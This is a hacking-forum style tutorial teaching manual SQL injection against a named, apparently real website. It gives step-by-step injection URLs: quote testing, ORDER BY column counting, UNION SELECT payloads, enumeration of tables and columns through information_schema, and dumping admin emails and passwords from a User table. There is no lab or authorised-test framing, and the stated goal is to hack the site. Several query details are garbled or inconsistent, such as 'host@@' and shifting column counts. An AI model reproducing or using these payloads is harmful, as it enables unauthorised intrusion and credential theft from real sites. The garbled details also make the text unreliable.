M0N$T3R# : How to hack website manual (Full Guide)

Hello Myanmar Hacking School(www.facebook.com/myanmarhackingschool) *-.-*

Once again ComeToHack here, today i gonna start Sqli Injection, today is First class so lets start.

Requirements :-

Firefox Browser

Hackbar

Vulnerability Site

Ok i have already Vulnerability site like this

http://www.morephotosradio.com/transcript.php?interview_id=2021

Check this this website vulnerability yes or no, Put ' in the end of Url Like
Step 1
=> http://www.morephotosradio.com/transcript.php?interview_id=2021'

yes i got a sql error you can see this

Step 2

=> Find tables numbers using order by--+- query For example

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 1--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 2--+- (No Error)

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 3--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 4--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 5--+- (No Error)

and so on when we got Error this mean its table number like

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+- (No Error)

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+- ( Error)

its mean its have 46 table numbers

Step 3
=> Go to union based => Union statement and Select INT,INT

Step 4

=> Now enter table number value and click ok

Step 5

=> after click ok you see this suto type 1 to 46 numbers then click Execute for checking its working

Its working we can't got any error :D

step 6

=> Put - in the end link values like this

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,

25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+-

you can see this when we put - we go got Columns number is 6

Step 7

=> Now we need version :-

replace 6 number this query "version()"

you can see this we got sqli Version if you want more information like user name hostname and database use this query :-

For Version = version()

For Database = database()

For use = use()

For Host = host@@

Step 8

=> now we need table information so replace 6 number follow query "group_concat(table_name)" without quotes and in the end or url use this query "from information_Schema.tables wehre table schema=database()--+-" without quotes like

For Tables

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(tables_name),7,8,9,10,11,12,13,14,15,16,17,18,19

,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.tables where table_schema=database()--+-

you can see this we got all table names , we need admin user name because we wanna hack website :D

Step 9

=> now replace "database()" with User

Now select user and go to "sqli basics" and select "char()" then past "user" then click ok like

And replace table with columns like this

For columns

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,

15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)--+-

now click Execute

Step 10

Now we need admin Email id and password now use this query

replace column_name with which data we need and ,0x3a, mean when we need more data or in the end of url type table name

For data

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17

,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from User--+-